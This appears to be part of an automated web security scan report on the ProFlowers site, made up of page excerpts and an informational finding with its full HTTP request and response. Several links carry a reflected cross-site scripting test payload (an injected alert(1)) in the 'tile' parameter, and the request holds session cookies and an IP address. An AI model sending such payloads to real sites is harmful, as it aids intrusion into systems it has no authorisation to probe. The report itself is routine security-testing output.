<a id="_ctl18__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/sitemap.aspx?Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" border="0" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="_ctl18__ctl91__repeater__ctl0__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_Landing_Home" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" border="0" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_ctl18__ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
<a id="_ctl21_DHero_rptSlides__ctl0_herolink" border="0" href="/mothers-day-flowers-MDF?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/HeroSpot_694x286_Mday_SoldOut.jpg" alt="Shop Belated Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
use=false;clearInterval(t);t = setTimeout(&#39;runSlideShow()&#39;, 1000);" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?trackingpgroup=HPC&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef"><img id="_ctl21_Ucproductrotater__productimage" border="0" onMouseOver="javascript:clearTimeout(t);" onMouseOut="javascript:pause=false;clearInterval(t);t = setTimeout(&#39;runSlideShow()&#39;, 1000);" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" border="0" style="height:198px;width:170px;" /></a>
...[SNIP]...
<div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/1_on.gif" id="_ctl21_Ucproductrotater_0" class="rotaterControlImageborder" OnClick="javascript:counter=0;changeImage();" onMouseOver="javascript:counter=0;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/2_off.gif" id="_ctl21_Ucproductrotater_1" class="rotaterControlImageborder" OnClick="javascript:counter=1;changeImage();" onMouseOver="javascript:counter=1;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/3_off.gif" id="_ctl21_Ucproductrotater_2" class="rotaterControlImageborder" OnClick="javascript:counter=2;changeImage();" onMouseOver="javascript:counter=2;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/4_off.gif" id="_ctl21_Ucproductrotater_3" class="rotaterControlImageborder" OnClick="javascript:counter=3;changeImage();" onMouseOver="javascript:counter=3;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/5_off.gif" id="_ctl21_Ucproductrotater_4" class="rotaterControlImageborder" OnClick="javascript:counter=4;changeImage();" onMouseOver="javascript:counter=4;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/6_off.gif" id="_ctl21_Ucproductrotater_5" class="rotaterControlImageborder" OnClick="javascript:counter=5;changeImage();" onMouseOver="javascript:counter=5;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/7_off.gif" id="_ctl21_Ucproductrotater_6" class="rotaterControlImageborder" OnClick="javascript:counter=6;changeImage();" onMouseOver="javascript:counter=6;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/8_off.gif" id="_ctl21_Ucproductrotater_7" class="rotaterControlImageborder" OnClick="javascript:counter=7;changeImage();" onMouseOver="javascript:counter=7;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/9_off.gif" id="_ctl21_Ucproductrotater_8" class="rotaterControlImageborder" OnClick="javascript:counter=8;changeImage();" onMouseOver="javascript:counter=8;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div><div class="" ><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/10_off.gif" id="_ctl21_Ucproductrotater_9" class="rotaterControlImageborder" OnClick="javascript:counter=9;changeImage();" onMouseOver="javascript:counter=9;pause=true;changeImage();" onMouseOut="javascript:pause=false;clearInterval(t);counter++;t = setTimeout(&#39;runSlideShow()&#39;, 1000);" /></div>
...[SNIP]...
etTimeout(&#39;runSlideShow()&#39;, 1000);" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?trackingpgroup=HPC&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_LeftPodCB_podimagehyperlink" href="/house-plants-PBS?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_LeftPodCB_podimage" class="fullWidthHeight" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/LeftPod_227X159_10_PlantGif2.jpg" alt="Shop Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a id="_ctl21_podOne_ProdImageHyperlink" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef"><img id="_ctl21_podOne_ProdImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" border="0" style="height:140px;width:120px;" /></a>
...[SNIP]...
<a id="_ctl21_podOne_TitleImage" class="headerimage" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages\PodTitle_SpecialOffer.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_podOne_buyButton" href="http://products.proflowers.com/flowers/Moms-Delight-5566?trackingpgroup=pid&amp;tile=hmpg_podB&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_podTwo_ProdImageHyperlink" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef"><img id="_ctl21_podTwo_ProdImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" border="0" style="height:140px;width:120px;" /></a>
...[SNIP]...
<a id="_ctl21_podTwo_TitleImage" class="headerimage" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/SIteimages/PodTitle_SeasonalFavorite.gif" alt="" border="0" /></a>
...[SNIP]...
d="_ctl21_podTwo_buyButton" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?trackingpgroup=pid&amp;tile=hmpg_podC&amp;Ref=HomeNoRef" style="height:19px;width:78px;"><img class="buyNow2" height="19px" width="78px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl21_RightPodCB_podimagehyperlink" href="/birthday-flowers-BIR?tile=hmpg_podD&amp;Ref=HomeNoRef" target="_self"><img id="_ctl21_RightPodCB_podimage" class="fullWidthHeight" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/Siteimages/RightPod_261X159_Birthday11.jpg" alt="Shop Birthday Gifts" style="border-width:0px;" /></a>
...[SNIP]...
<div class="FlynnMagDefault FlynnMag">

   <img class="leftend" text="-" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/endLeft.gif" border="0" />
   <div class="magText">
...[SNIP]...
</div>
   <img class="rightend" text="-" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/endRight.gif" border="0" />
</div>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
Input" type="text" value="Enter Your Email Here" id="_ctl22__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
est flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a>
<a title="A wide selection of green and exotic plants, perfect for gift and home décor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home décor." border="0" /></a>
...[SNIP]...
onal flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
   <a title="Unique personalized gifts for life’s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life’s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a>, find <a href="http://www.facebook.com/ProFlowers"> ProFlowers on Facebook</a> and <a href="http://twitter.com/PROFLOWERS"> Twitter</a> to see what’s new, read floral tips, and get <a href="http://www.proflowerscoupons.com">ProFlowers coupons</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.30. http://www.proflowers.com/house-plants-PBS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/house-plants-pbs"/>
       <link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_category.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
   </head>
...[SNIP]...
<div id="innerContainer">

                       <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
